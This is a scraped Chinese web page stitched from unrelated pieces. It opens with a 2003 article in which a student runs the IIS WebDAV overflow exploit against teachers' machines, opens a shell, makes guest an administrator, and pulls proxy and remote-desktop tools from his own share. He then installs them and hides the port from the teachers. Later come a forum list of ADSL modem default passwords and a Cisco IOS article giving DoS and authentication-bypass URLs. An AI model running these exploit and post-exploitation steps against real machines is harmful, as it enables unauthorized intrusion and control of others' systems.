突破路由限制

来源:百度文库 编辑:神马文学网 时间:2024/04/28 22:43:46
作者:CodFish 来源:CodFish 加入时间:2003-6-11 阅读次数:7024
为了预防非典,学校实行封闭式管理,学校内外的网吧又全部关闭,本来学校的机房
周六周日对外开放可以上网,现在学校一声令下也不许开.这可苦死了我们一帮
网虫呀,好在为了不影响教学质量我们平时的上机实验还是正常进行,我们学校那个
机房联网方式是,教师和学生机分两个字网分别是192.168.0.0和192.168.18.0为了
方便文件共享2个网络通过win2000的软路由连接.我们平时上机时老师就对win2000
的软路由进行限制.丢弃所有学生子网访问外网的数据包,但2个子网之间可以正常
访问说到这里聪明的朋友已经知道了怎么样突破了吧.对.只要我们访问外网的数据
包都通过教师的机器转发,就可以解决问题了.因为路由认为我们是访问教师的机器,
便让数据包通过而教师机再访问外网是不受限制的.原理并不难关键是怎么样在教师
机器上装代理软件.总不能跑到教师办公室里和教师说吧!既然这样不行的话,我们
就得用点非常规手段啦!由于现在webdavx溢出非常流行,所以我就用WebDAVScan对教
师子网全方位扫描,果然不出我的所料.发现了2台.
192.168.18.5 iis5.0 enable
192.168.18.18 iis5.0 enable
看来我的运气还是挺好的.接下来开始夺权吧
f:\>hacker\tools\webdavx3 192.168.18.5
IIS WebDAV overflow remote exploit byisno@xfocus.org
start to try offset,
if STOP a long time, you can press ^C and telnet 192.168.0.1 7788
try offset: 0
try offset: 1
waiting for iis restart.......................
try offset: 2
waiting for iis restart....................... (IIS reboot,just waiting...)
程序运行到这里停顿稍长时间,若停顿时间比较长而无反应,^C)
^C
f:\>hacker\tools\nc -vv 192.168.18.5 7788
进入目标机c:\winnt\system32
现在嘛,我是老大我怕谁!
c:\net user guest /active:yes
c:\net localgroup administrators guest /add
把guest用户激活并提升为管理员。
在自己的电脑上共享一个文件夹如 daili
c:\winnt\system32>copy\\192.168.0.10\daili\skserver.exe
已复制1个文件
c:\winnt\system32>copy\\192.168.0.10\daili\c3389.exe
已复制1个文件
c:\winnt\system32>copy\\192.168.0.10\daili\3389.exe
已复制1个文件
c:\winnt\system32>skserver -install (安装skserver)
Snake SockProxy Service installed.
c:\winnt\system32>skserver -config port 4000 把默认端口改成4000
The Port value have set to 4000
c:\winnt\system32>skserver -config starttype 2 把服务设定为自动启动
The New StartType have set to 2 -- Auto
c:\winnt\system32>net start skserver
Snake SockProxy Service 服务正在启动 .
Snake SockProxy Service 服务已经启动成功.
好了,现在代理服务安装完毕,我们可以把qq的sock5代理ip设为 192.168.0.5
端口为4000怎么样上去了吧。想看网页呀,点qq的浏览器呀!
如果出现超时的提示的话我们就要用到sockscap(代理帽子了)一路回车安装好
sockscap后填上你做的代理服务器ip地址和端口号并选者允许socks5代理,配置完毕
以后会出现一个主界面。把qq拖入空白框里就可以了!如IE之类不能拖入的可以
点击file-new-browse选者你要代理的软件就可以了。
如果你还想更多更方便的利用这个台机器的话我们就要用到我上传的3389.exe
和c3389.exe了
3389.exe就是开启3389终端服务的工具只要直接执行3389.exe 等主机重启后你
就可以用xp_ts连接上去了,
如果你等不急想立即重启的话只要在加个参数 /r就可以了!c3389是我们
用来改端口因为使用默认的3389端口的话容易被老师发现,而且还容易被同行
盗用。呵呵c3389的用法是直接打入c3389你要更改的端口号 回车就可以了 。
等机器重启后你就可以登陆了,不过用xp-ts连接的时候要用IP:端口来连接
否者无法登陆。比如我就要用192.168.18.5:5001来登陆。
为了不让老师发现你可以用ca或pus更改注册表克隆一个帐号具体方法就不细说了。
毕竟我现在可以上网了。
By CodFish
QQ:2866210
转贴于 『中国X黑客小组』WwW.CnXHacker.Net 作者:
--  作者:清枫天魔剑
--  发布时间:2004-11-21 14:16:52
--  ADSL路由修改打包教程,教你突破电信ADSL路由限制(要求加精)
1.★★华为 SmartAX MT800设置路由方式教程 ★★
最近,我看到一篇介绍华为 SmartAX MT800设置路由方式教程文章,于是就发挥DIY精神,小试了一下,居然自改了ADSL路由,突破了电信限制,现在我和邻居的两台机器(共一个四口的交换机(也可用HUB),采用星形连接,每一台电脑都可以单独上网),共用一个华为的ADSL猫,上网超级爽!价钱只有原来全包的一半,想学的朋友就来看看这个教程吧。
问题一:登陆信息  设置前要先把你PC的IP改为192.168.1.XXX(比如:192.168.1.5),IP一般为192.168.1.1;用户名/密码:admin/admin(或者admin/epicrouter)。
问题二:登陆后的设置界面
华为MT800有几种软件版本,我写的教程只是其中一种,如果大家的版本(设置界面)不同,请先在《华为产品系列》找我发的《华为MT800全系列说明书》下载(要用acrobat 5.0以上版本才能打开),然后参考这篇教程设置。
问题三:ADSL是否支持路由/自动拨号功能
先看对应版本的说明书,如果说明书上有,那就有;如果没有提到,那就很可能不支持了。
特别说明:本人不建议没有路由功能的ADSL通过刷固件的方式升级,毕竟太危险了,真要是刷新失败,那你就只能等你的ISP(网络服务提供商)来帮你换ADSL了。(要先想想等多久你才能上网)
问题四:ADSL猫掉线  华为的ADSL确实存在掉线问题(当时是到朋友那里探亲而已,目前原因我还没有查清楚,可能是散热及芯片问题),至少我帮朋友做路由功能后的ADSL存在(每天早上第一次用)。解决的方法是第一次开ADSL后关闭它再重新加电就不会掉线了。
问题五:关于VPI/VCI值  每个城市ISP都有自己的VPI/VCI值,一般为0/35或8/35,如果试了不行,那你只能去网上查自己所在城市的VPI/VCI值,或者打电话问你的ISP。
问题六:组网连接问题  如果你想多台PC通过交换机上网,请你用直接线将ADSL接到交换机上;ADSL标配的原装线是交叉线,那条线只能用于ADSL和PC的直接连接。
问题七:关于猫的型号问题
论坛帖子里提到软件版本指的是进入猫的WEB设置页之后,首页有一项就是:软件版本,后面跟有一系列字符串。规范的说,猫的型号就是MT800。当然,大家叫通俗了,就把软件版本叫成型号了:)
华为 smartax mt800设置路由方式教程+修改路由的详细图解
清枫下载1:)
清枫下载2:)
2.★★其它各种型号ADSL路由修改打包教程
以文本方式查看主题
-  浠水论坛  (http://www.xishui.org/bbs/index.asp)
--  网站设计  (http://www.xishui.org/bbs/list.asp?boardid=22)
----  ADSL路由破解  (http://www.xishui.org/bbs/dispbbs.asp?boardid=22&id=7959)
--------------------------------------------------------------------------------
--  作者:笑忘江湖
--  发布时间:2004-8-24 22:06:06
--  ADSL路由破解
刚刚想起了这个问题,一个很实际的问题。浠水的在用ADSL的不在少数吧?可是现在都已经关闭ADSL MODEM的路由了,需要由软件方式PPPOE拨号上网了!~
如果楼上楼下两台电脑,同时上网还是有点麻烦的。虽然可以用代理服务器,可是代理服务器是需要一台打开的电脑做代理主机的。我之前尝试过这样的方式,完全可行。只是这样,偶还觉得有点不爽,能不能直接破解MODEM 的ADSL路由共享呢???
不要谈外接路由器,这种方法是很简单,可是我现在需要和各位大侠探讨一下破解ADSL-MODEM的路由功能。希望大家踊跃发表看法啊!
--------------------------------------------------------------------------------
--  作者:寶寶
--  发布时间:2004-8-24 22:36:35
--
中兴831
一个新机子,网卡插好了,WINDOWS装好了,驱动完毕了,桌面上有网络邻居了。此时,在TCP/IP 协议里设置:
DNS:202.103.0.68 IP:192.168.1.X(X=2~255?)
掩码:255.255.255.0
网关:192.168.1.1
如是WIN98,设网关和DNS时别忘了点添加。
设置完毕,重起(XP不需要重起)
开网页!在地址栏输入
http://192.168.1.1
没有连接网络难道可以打开IE吗?
可以!只要按照我上面这么设置,即使没有连接上网络,但只要你的MODEM上插了电话线,网线,且与网卡连通,那么在没上网的情况下,也可以访问到此猫IP。
然后是设置,在主页面有“快速设置”,点进去,里面应该有0-7个通道可以选择,你该选哪一个呢?在这里告诉大家,根据您老所在地区的情况,选择适合您VPI VCI值的那一个,例如我的,我这是0 35,我选这个,在这个通道里,我选择PPPOE LCC,从上到下,需要设置开或关的选项依次为开,关,开,开。在最下面输入用户名,密码,选择递交。然后是最重要的一步。
其他的通道,你全部关闭,并递交,只留下你需要的通道,然后选择保存并重新启动,N秒后,没有电视在右下脚煽动的网络通畅了!
此方法经我2次实验完全可行。我的猫进入是4选项的,是被遗弃的那种,我感觉,这中兴猫,不管是几选项,几通道,只要他可以直接设置PPPOE,并有合适通道,就可以设路由,并不需要刷版本,刷BIOS。
找到别的了再发上来,你看看你需要什么猫开路由!
落了一个东西,哈哈。。猫的帐号和密码都是大写的 "ZXDSL"
--------------------------------------------------------------------------------
--  作者:寶寶
--  发布时间:2004-8-24 22:43:00
--
注意:VPI,VCI一定要正确啊!偶下面这张帖子有阿尔卡特SPEED TOUCH 的详细教学这里就不列出
以下涉及到的DNS和VPI/VCI我列举的是成都的,各地区数值请到下面查询http://bbs.jj.jx.cn/viewthread.php?tid=137154&fpage=1
ZyXel的prestige600(642)路由和端口映射的设置方法
1。先将你的IP地址指定在192.168.1.*的网段。
2。telnet192.168.1.1默认的密码是1234
3.进入主菜单第1项的1项。
RouteIP=Yes
RouteIPX=No
Bridge=No
4。进入主菜单第3项的2项
Menu3.2-TCP/IPandDHCPEthernetSetup
DHCPSetup
DHCP=None
ClientIPPoolStartingAddress=N/A
SizeofClientIPPool=N/A
PrimaryDNSServer=N/A
SecondaryDNSServer=N/A
RemoteDHCPServer=N/A
TCP/IPSetup:
IPAddress=192.168.1.1(这是路由器的IP地址)
IPSubnetMask=255.255.255.0
RIPDirection=Both
Version=RIP-1
Multicast=None
IPPolicies=
EditIPAlias=No
PressENTERtoConfirmorESCtoCancel:
PressSpaceBartoToggle.
5。进入主菜单第11项的1项
RouteIP=Yes
Bridge=No
在user和password上填上你的PPPOE的用户名和密码。保存。ok
6。进入24项的1项,等第一行变成UP就可以上网了。
7。NAT,进入15项在DEFAULT后面填上你的机子的IP地址就可以了~(不支持win98的PWS。)
注:华勤有642和642-S之分,主要是看设备底部,有明显注明。642-S应为642的升级版,支持WEB方式调试。用户名:admin,密码:1234
科迈易通ADSL内置拨号(即路由模式)设置方法
1.先将网卡地址设置为192.168.1.2,子网掩码:255.255.255.0,网关:192.168.1.1,主控DNS:61.139.2.69(我列举的是成都的,具体设置请根据地域选择)
2.然后进入设置页面192.168.1.1,用户名:root,密码:root
3.查看“首页”——“系统视图”——“WAN接口”,找出对应该区域的VPI/VCI的值的“接口”(eoa-X)和“较低层接口”(aal5-X)(注:X为任意数)!
本步骤也可理解为找出你所在的区局的0,35或8,35对应的eoa和aal5-的值备用!
4.点“桥接”——删除“eoa-X”(X即你刚刚记下的对应值)
5.点“桥接”——“EOA配置”——删除相应的“aal5-X”(X即你刚刚记下的对应值)
6.点“广域网络”——“PPP配置”——“添加”——“ATMVCC”中选中“aal5-X”(X即你刚刚记下的对应值),其他按照默认不变,在用户名和密码处输入你的用户名和密码。
7.点“管理”——“提交/重启”——“提交”——“重启”!(本步骤只为保存设置,实际上在第6步完成后即可正常上网)
总结:本方法是在指定网卡IP、子网掩码、网关及DNS时使用,如果想全按自动获得地址的方法使用时需激活设备的DHCP功能,方法这里不再详述!
D-link 500  路由设置方法
1、设置网卡IP地址为:10.1.1.2;子网掩码:255.0.0.0;网关:10.1.1.1;DNS:61.139.2.69(我列举的是成都的,具体设置请根据地域选择)(Win9X重启,Win2K/XP继续)
2、打开IE,地址栏输入:10.1.1.1,用户名和密码都是admin(如果没被改动的话!)
3、点主页——快速设置——最上面的值选0就行。
4、封装格式还要改为PPPOE和LLC,还要填对VPI/VCI值
5、将桥接选项设置为Disable,将IGMP(好像是记不清了)设置为Enable,把Router选成Enable
6、已设置完成,你可以点WAN——PPP——如果右边显示出Link UP,那么恭喜你,调试成功了!
北京港湾ADSL的路由设置方法
1、先设置网卡的TCP/IP属性:
IP地址为:192.168.1.2(因为猫的默认IP为192.168.1.1,只要是和它同网段的就行)
子网掩码为255.255.255.0
添加192.168.1.1为新网关
DNS:61.139.2.69(我列举的是成都的,具体设置请根据地域选择)
2、打开浏览器,在地址中输入http://192.168.1.1 ( 用户名admin 密码harbour )即可进入WEB配置界面了。
3、在“主页面”中检查VPI/VCI 的值是否与“广域网接口”设置状态中的VPI/VCI的其中一条的值相同。
若有相同的,记下那个相应的VPI/VCI所对应的底层接口(ATM接口)即aal5-*。 因为在后面介绍的快速设置中选择了相应的ATM接口,Modem就会自动选择VPI/VCI值的。
然后选择主页中的“快速设置”,进入快速设置界面进行设置。
我给举个例子:
比如:刚才在“广域网接口”设置中VPI/VCI对应与aal5-4,则ATM接口选择:4
● 运行模式选择:Enable
● 封装格式选择:PPPoE LLC
● 桥接选择:Disable
● 启用DHCP 选择:Disable
● Default Router 选择:Enable
● 用户名填写:电话号码
● 密码填写:你的密码
● 启用DNS 选择:Enable
填写完相应的信息后,其余参数不必改动,可保持默认值。然后点击“提交”按扭,保存设置
若刚才的参数中VPI/VCI 的值与“广域网接口”设置状态中的VPI/VCI的任意一条的值都不相同。在快速设置中的设置如下:
举个例子:
● ATM 接口选择:0
● 运行模式选择:Enable
● 封装格式选择:PPPoE LLC
● 桥接选择:Disable
● 启用DHCP 选择:Disable
● VPI 填写:1(成都的具体请参考地域选择)
● VCI 填写:33(成都的具体请参考地域选择)
● Default Router 选择:Enable
● 用户名填写:你的用户名
● 密码填写:你的密码
● 启用DNS 选择:Enable
填写完相应的信息后,其余参数不必改动,可保持默认值。然后点击“提交”按扭,保存设置。
4、永久保存
进入设置界面的管理页面保存设置。点击“保存”&“重启”选项,单击“保存”
按扭,保存设置。并单击“重新启动”按扭,重新启动Modem。
华硕AAM6000EV 路由设置方法
1.在IE浏览器中输入192.168.1.1(如果进不去的话,在网卡的TCP/IP属性中的网关里添加192.168.1.1)
然后要求输入用户名,默认用户名:ADSL,默认密码:ADSL1234.
2.进去后在上面的项目中点击“Bridging“选项,进入后将所有桥接都删掉,点击RFC-1483 Brdiging Interface(1483B) 选项,把全部都删掉,再点击ATM VC 选项,也把全部都删掉,删掉后按“添加”
按照以下内容进行填写:
VC Interface: aal5-0
VPI :1(成都的具体请参考地域选择)
VCI :33(成都的具体请参考地域选择)
Mux Type: LLC
Max Proto per AAL5: 2
接下来,按WAN选项,再点击“PPP”选项,按“添加” ,按照以下内容进行填写:
PPP Interface: ppp-0
ATM VC: aal5-0
IPF Type: Public
Status: Start
Protocol: PPPoE
Service Name:填不填也无所谓
Use Dhcp: Disable
Use DNS: Disable
Default Route: Enable
Security Information
Security Protocol: PAP
Login Name: 你家用户名
Password:你的密码
再按“提交“
点击“Admin“,再点击“Commit & Reboot“按一下提交,过一会,提交成功后,最后按重启,就行了!
3.在网卡的TCP/IP属性中把IP地址设置成192.168.1.X ( X表示填入的数,2到254任填,但不能填1,因为MODERM的默认IP地址是192.168.1.1)
选DNS配置,然后启用DNS,主机随意填,DNS服务器搜索顺序,先填主DNS:61.139.2.69(我列举的是成都的,具体设置请根据地域选择)按添加,再填次DNS:202.96.209.133(这是上海的,就当备用吧),好,完成了,重启。
以上我说的是黑色新版的设置方法!银灰的和乳白的和它差不多。
E-TEK TD-2018有路由功能,设置方法如下:
准备工作:
设置网卡的TCP/IP属性中的IP地址为192.168.1.2(或是除了192.168.1.1的同网段IP)
子网掩码:255.255.255.0
找开IE,在地址栏输入:192.168.1.1,正常情况下会出现登陆框,用户名留空,密码:12345
进入界面之后,点击左边选项菜单的“ATMPVC设置”,查看页面最下端的“连接列表”中的启用了几个VC(虚拟电路),一般来说,"0"和“1”都是已经启用了。
点击“连接列表”中的“1”号VC,再回到页面上端,会看到“虚电路”为“1”,接着将“启动”的选项置为“否”,再点击“执行”,则“1”号虚电路将被取消。
然后选择“连接列表”中的“0”号虚电路,将其VPI设为“1”,VCI设为“33”(我列举的是成都的,具体设置请根据地域选择)再取消“启用桥接功能”,并选择“PPPOE”选项,填入用户名和密码,“超时断开连接”为0,超时陈化为300,启用“PPP重新连接广域网,跟着点击“执行”,则此项设置完毕。
再选择“NAPT设置 ”,启用NAPT并点击执行
选择“局域网IP设置”,IP地址为192.168.1.1,掩码为255.255.255.0
选择“保存设置”,点击“保存”,选择“重新启动”,点击“重新启动”
至此,路由设置完成。用一条直连线连接MODEM和HUB的UPLINK端口,或用一条交叉线连接MODEM和HUB的端口。在自己机器的网卡IP的设置中,默认网关为192.168.1.1, DNS服务器为:61.139.2.69(我列举的是成都的,具体设置请根据地域选择),并用一条直连线连接PC和HUB。设置全部完成!
普天(上海邮通也适用)ADSL 路由设置方法
对网卡的TCP/IP协议进行如下配置: (Modem出厂时的IP地址为:192.168.1.1)
IP设成和MODEM同一网段(比如:192.168.1.2),以便通过浏览器进入MODEM的配置界面;
网关设成ADSL MODEM的IP地址(192.168.1.1);
DNS服务器设成MODEM的IP地址或有效的DNS服务器。如:61.139.2.69(我列举的是成都的,具体设置请根据地域选择);子网掩码:255.255.255.0。
然后打开浏览器,在地址栏中键入http://192.168.1.1 。回车后弹出登录对话框,输入普天的用户名和密码分别是:putian和123456,进入MODEM的配置界面
然后进入“WAN”界面,把除了1以外的所有虚电路都关掉!(点击下面的小菜单,选一个关一个)
然后再进入虚电路1进行一下设置:
封装协议:PPPOE LLC
桥:disable
然后输入你的用户名和密码
把“自动重连接”选上!
然后提交保存重启就可以了!
这样PPPOE的路由就设置好了!
斯达康的猫
网卡设置:
IP:192.168.1.1
网关:192.168.1.1
子网掩码:255.255.255.0
DNS:61.139.2.69(我列举的是成都的,具体设置请根据地域选择)
进入设置界面的用户名是admin,密码是utstar
1、在WAN中设置VPI/VCI  例如1/33(我列举的是成都的,具体设置请根据地域选择)
2、封装协议选PPPOE LLC,桥设为关闭;
3、在PPP设置中,填好用户名和密码,审核设PAP,自动连接选上;
4、设置虚电路,这是最关键的一步,也是很多朋友设置失败的主要原因,虚电路分0~7,按照本地情况(成都这里是0,好像很多地区也都是0)设置一个,然后在画面的左上方选“启用”,关键的是剩下的7条虚电路都要关闭,逐条设置,每选一条,就要在左上方选关闭,依此类推,直至把不用的7条全部关闭,记住,每关闭一条,就要提交一次。
5、在控制台的NAT中选NAPT
--------------------------------------------------------------------------------
--  作者:寶寶
--  发布时间:2004-8-24 22:51:03
--
品牌:实达
用户名:admin 密码:conexant
用户名:root密码:grouter
用户名:admin 密码:starnetadsl
品牌:艾玛
用户名:admin 密码:admin
品牌:神州数码/华硕
用户名:adsl 密码:adsl1234
品牌:全向
用户名:root 密码:root
品牌:普天
用户名:putian 密码:123456
品牌:e-tek
用户名:admin 密码:12345
品牌:zyxel
用户名:anonymous密码:1234
品牌:北电
用户名:anonymous 密码:12345
品牌:大恒
用户名:admin 密码:admin
品牌:大唐
用户名:admin 密码:1234
品牌:斯威特
用户名:root 密码:root
用户名:user 密码:user
品牌:中兴
用户名:adsl 密码:adsl831
品牌:BENQ
用户名:user 密码:benq1234
品牌:华硕
用户名:ADSL 密码:adsl1234
例 :
Viking            adsl     adsl1234
ADSL Router       admin    1234
MT800             admin    admin
--------------------------------------------------------------------------------
--  作者:寶寶
--  发布时间:2004-8-24 22:53:15
--
注意:请有些不自觉的人不要对自己本地网吧动手,不然以后绝对不会公布这些东西!有本事自己去黑小日本!
--------------------------------------------------------------------------------
--  作者:笑忘江湖
--  发布时间:2004-8-25 12:51:53
--
好东西。哪里找的这么多MODEM的默认密码?呵呵,只要电信没改这个,就比较好办一点。
不错不错,好文章。
--------------------------------------------------------------------------------
--  作者:笑忘江湖
--  发布时间:2004-8-25 12:55:27
--
浠水的VPN/VCI应该可以选默认的吧?只要你有密码进去就好办。现在的猫都多数可以用WEB页面来管理的,进去以后设置也很方便。不过偶自己没那东西,没实验过。呵呵!
谢谢了!
桥接是必须要关的,再者,启用DNS也应该打开是吧?有时间回去了,我给几个朋友改改,就可以不让他们受电信的剥削了!呵呵
敬礼!~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--------------------------------------------------------------------------------
--  作者:near
--  发布时间:2004-9-8 11:01:03
--
DDDDDDDDDDDDD
--------------------------------------------------------------------------------
--  作者:151224
--  发布时间:2004-10-6 9:41:06
--
好牛啊
--------------------------------------------------------------------------------
--  作者:追梦人
--  发布时间:2004-10-16 1:51:56
--
不错
有了这么多默认的密码我就不用手工破了
还好这里是用201卡来包月上adsl的
每次弄个帐号可以用好久呢,上网不花钱爽死了
--------------------------------------------------------------------------------
--  作者:追梦人
--  发布时间:2004-10-16 1:54:01
--
谁知道广东那边的adsl ip的网段啊,告诉一下
--------------------------------------------------------------------------------
浠水网 万山科技
Copyright ?2002 - 2004 XiShui.NET
执行时间:343.75000毫秒。查询数据库3次。
本论坛言论纯属发表者个人意见,与浠水网立场无关
当前模板样式:[默认模板]
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
添加文章 English Version
文章分类
专题文章 <<
漏洞分析
安全配置
黑客教学
编程技术
工具介绍
火墙技术
入侵检测
破解专题
焦点公告
焦点峰会
文章推荐
LSD RPC 溢出漏洞之分析
任意用户模式下执行 ring 0 代码
IIS的NSIISLOG.DLL溢出问题分析
Cisco路由入侵艺术
如何在CISCO路由器上禁止BT下载
作者:ITVUE整理    最新信息来源:net130    点击数:365    更新时间:2004-10-30
方法有多种,常见的有:
1、找出ip做端口限速(这样做比较麻烦)
2、用NBAR(非常好用)
但是重新启动需要重新调用 tftp://130.130.122.123/bittorrent.pdlm 这个文件,所以还是用flash卡比较好。如果不调用文件,那就会发生没有match protocol bittorrent
ip nbar pdlm tftp://130.130.122.123/bittorrent.pdlm
class-map match-all bit
match protocol bittorrent
policy-map limit-bit
class bit
police cir 240000
conform-action transmit
exceed-action drop
police cir 8000
conform-action   transimit
exceed-action drop
interface fastethernet 0/1
service-policy input limit-bit (下载)
service-policy output limit-bit(上传)
ip nat outside
interface fastethernet 0/0
ip nat inside
ip nat inside list 1 pool nbar-pool overload
access-list 1 permit any
ip nat pool nbar-pool
8000 < 1k
80000 < 4k 5k, 5k 5k
160000 < 16K, 13K
240000  <=22k, 24K
800000 <=80K <100K
创建时间:2003-04-11
文章属性:原创
文章提交:meteorstary (meteorstary_at_163.com)
Cisco路由入侵艺术
作者:紫天星
时间:2002-1-21
奔流不息的网络里,Web绽放着绚丽的色彩、电子邮件呼哧的穿梭网际、语音电话、网络会议、文件传输,各种数据交织错落,形成辉煌的数字世界。在喧闹的数字世界底层,存在一种精致的次序,这种次序决定着数据的选路、异构介质衔接、协议的交互等功能。而这一次序的缔造者正是布满整个网络的路由器。于是,路由器成了数据通信的交通亭,也成为了众多黑帽(Blackhat)争夺的目标之一。
Cisco路由器占据这网络世界的绝对位置,于是安全焦点效应激发了路由入侵与防御而产生的精美艺术。下面我将由浅入深的方式讲述Cisco入侵的手段以及防御策略。
【路由器感冒】
路由器从本身的IOS来说,并不是一个健壮的体系,因而它偶尔也会让自己感冒发烧。系统感冒发烧起来,抵抗力自然就降低不少。
*IOS自身欺骗
Cisco路由器是用IOS系统来实现路由的细节功能,因此它是路由系统的灵魂。Show命令的在线系统方式却为我们打开一个偷窥之门。
众所周知,Cisco路由器中,一般用户只能查看路由器的很少信息。而能进入特权模式的用户才有资格查看全部信息和修改路由。一般模式下,show的在线帮助系统不会列表所有可用的命令,虽然75个show的扩展参数只能用于特权模式下(enable),实际上只有13个受到限制。这意味着一般用户(非特权用户)可以查看访问列表或其他路由安全相关信息。
重要安全相关的ACL信息可以被登录路由的非特权用户查看,诸如:
#show access-lists
#show ip prot
#show ip ospf dat
#sh ip eigrp top
等命令可以在非特权模式下泄露网络敏感信息。通过这些命令,我们能得出路由器配置的大致情况,这对采取进一步的入侵起到辅助作用。不过由于这种方式需要用户已经有一个登录帐户,因此得到这样的信息有一定难度。
*WCCP暗道
Cisco在IOS 11.2版本中引入WCCP(Web Cache Control Protocol),为Cisco缓存引擎提供协议通信。Cisco缓存引擎为www提供透明缓存服务。缓存引擎用WCCP来和其他cisco路由器通信。路由器把HTTP数据发送到缓存引擎主机中。
虽然这种方式默认是关闭的。假如使能(enable)的话,那么WCCP本身是没有认证机制的。路由器将会把每一个发送合法缓存引擎类型的Hello包的主机认为缓存引擎,于是把HTTP数据缓存到那台主机。这意味着恶意用户可以通过这种方式获取信息。
通过这种方式,攻击者可以截获站点认证信息,包括站点密码;替代实际WEB内容为自己设计的陷阱;通过路由彻底破坏Web提供的服务。这种方式,可以完全规避登录烦琐的攻击方法,对Web提供全面而且致命的打击。
我们既可关闭WCCP的启用机制,也可通过ACL阻止WCCP发送HTTP流量给不信任主机来防止这样的恶劣情况发生。
*HTTP服务的困惑
Cisco在IOS版本加入了远程管理路由的Web特性,这对于新羽(newbie)的管理员来,无疑是值得高兴的事情。但引入方便的同时,隐患也随之进入。
1.基于拒绝式服务攻击的HTTP的漏洞
Cisco路由启用(enable)远程WEB管理,很容易遭受DoS。这种DoS能导致路由器停止对网络请求的响应。这是功能是Cisco路由的内嵌功能。但启用这个特性,通过构造一个简单的Http请求就会造成DoS攻击:
/%%">http:///%%
这种请求导致路由停止响应,甚至引起路由器执行硬重置(hard reset)。
2.基于HTTP服务器查询的漏洞
Cisco 安全建议小组在2000年10月30日公布了这个漏洞。IOS 11.0引入通过Web方式管理路由。”?”是HTML规范中定义的CGI参数的分界符。它也被IOS命令行接口解释成请求帮助。在IOS 12.0中,当问号邻接于”/”,URL解释器就不能正确解释其含义。当一个包括”?/”的URL对路由器HTTP服务器进行请求,并且提供一个有效的启用口令,则路由器进入死循环。因而引起路由崩溃并重起。
如果http起用,浏览
http://route_ip_addr/anytest?/
并且提供特权口令,则可以导致DoS攻击,导致路由停机或者重启。
除了让路由死亡之外,Http额外提供了一种可怕权限提升的漏洞,如下所论。
3.Cisco IOS 认证漏洞
当HTTP服务器启用并且使用本地用户认证方式。在某些条件,可以绕过认证并执行设备上的任何命令。用户可以对设备完全的控制。所有命令都将以最高特权执行(level 15)。
使用username 和password的路由设备帐户认证方式,构造如下URL:
http://router_ip_addr/level/xx/exec/….
(注:xx代表16至99之间的84种不同的组合攻击,因为路由器硬件类型众多,而IOS版本也存在不同,因此针对不同的路由器类型,攻击组合数字不同。)
通过这种方式,攻击者可以完全控制路由并可以改变路由表配置。这种可怕的事实让网管也感到惊悸。这种完整的控制方式将是网站数据通信枢纽的致命一击。
虽然Http漏洞带来如此之多的漏洞,但这种漏洞最主要原因是因为启用http服务器管理路由的缘故,由于这种管理是种命令行方式的替代物,因此对于熟练的网管来说,没有必要启动这种危害性很大的服务。
#no ip http server 的路由配置也成为时髦的安全配置语句。
【在SNMP中行走】
谈到Cisco路由的安全性,我们就必须涉及到SNMP这个看似简单,实际扮演着重要角色的协议,正因为它的存在,路由器的入侵变的丰富有趣多了。
*SNMP基础简介:
每个SNMP启用的路由设备都包含一个叫做管理信息模块(MIB),这是一种包含简单等级的数据目录结构,在这种树结构中包含设备各种信息。SNMP基本的命令GET,可以检索MIB的信息,而SET命令则可设置MIB变量。一种用于监控和管理CISCO路由的的软件工具是MRTG,至于如何配置其用于Cisco设备的监控可以参阅LOG的《怎样在Windows NT/2K下安装MRTG》一文(http://www.2hackers.org/cgi-bin/2hb/topic.cgi?forum=7&topic=212)。
在路由器中配置SNMP的方法如下:
(conf)#snmp-server community readonly RO
(conf)#snmp-server community readwrite RW
SNMP协议通过社区(community)字串的概念赋予对设备MIB对象访问的权限。上例中,设置了只读访问的社区字串readonly和可进行读写操作的readwrite社区字串。而大部分管理员喜欢使用public和private设置只读字串和读写字串,疏不知,这样轻易的结果将给网络带来巨大的波动。我们可以在【触及RouterKit】部分清楚认识到这种危害。
通过SNMP我们可以方便管理和监控Cisco的设备(参阅Log文章介绍),同时也给攻击者带来可乘之机。
*Cisco IOS软件SNMP读写ILMI社区字串漏洞
ILMI是一个独立的工业标准,用于配置ATM接口。MIB是一个树形结构,包括操作(只读)数据以及配置(读写)选项。在有漏洞的设备上,通过在SNMP请求中指定一个ILMI社团字符串,可以访问整个树形管理结构中三个特定部分的对象:MIB-II系统组,LAN-EMULATION-CLIENT MIB以及PNNI(Private Network-to-Network Interface)MIB。每一部分的子集对象都可以使用相同的“ILMI”社团字符串修改。
MIB-II系统组包括设备本身的基本信息。能被修改对象的数目虽然是有限的。例如包括:
system.sysContact.
system.sysLocation.
system.sysName.
Cisco IOS软件版本11.x和12.0允许使用一个非文档的ILMI社区字串未经授权就查看和修改某些SNMP对象。其中就包括诸如上面所说的"sysContact","sysLocation",和"sysName"对象,虽然修改它们不会影响设备的正常操作,但如果意外修改可能会产生混乱。剩下的对象包含于LAN-EMULATION-CLIENT和PNNI MIBs,修改这些对象可以影响ATM配置。如果没有防止未授权使用ILMI社团字符串,一台有漏洞的路由器可能会遭受DoS攻击。
如果SNMP请求可以被有漏洞的设备接收,那么没有适当授权,就可以访问某些MIB对象,违背了保密性。没有授权就可以修改可读MIB对象的子集,破坏了完整性。而更具有危害性的方法是向SNMP端口发送大量的读和写请求。有漏洞的设备,如果没有防范接收SNMP包的措施,就会遭受DoS攻击,导致路由重载。
至于如何查看这些对象的信息,可以参阅【触及RouterKit】部分。
*Cisco IOS软件层叠SNMP共享社区字串漏洞
Cisco 配置文件中,意外创建和暴露SNMP共享字符串,可以允许未授权地查阅或者修改感染的设备。这种漏洞是调用SNMP函数中的缺陷引起的。SNMP利用“community”的标记来划分“object”组,可以在设备上查看或者修改它们。在组中的数据组织MIB。单个设备可以有几个MIBs,连接在一起形成一个大的结构,不同的社团字符串可以提供只读或者读写访问不同的,可能重叠的大型数据结构的一部分。
启用SNMP,键入“snmp-server”命令时,如果社区在设备上不是以有效的社区字串存在,就会不可预料地添加一个只读社区字串。如果删除它,这个社区字串将会在重载设备时重新出现。
缺陷源于SNMPv2的“通知(informs)”功能的实现,这个功能包括交换只读社区字符串来共享状态信息。当一个有漏洞的设备处理一条定义接收SNMP "traps"(陷阱消息)主机的命令时(常规snmp-server配置),在trap消息中指定的社团也还是配置成通用,如果它在保存配置中没有定义。即使社区在前面被删除并且配置在系统重载前保存到存储器,也会发生这种情况。
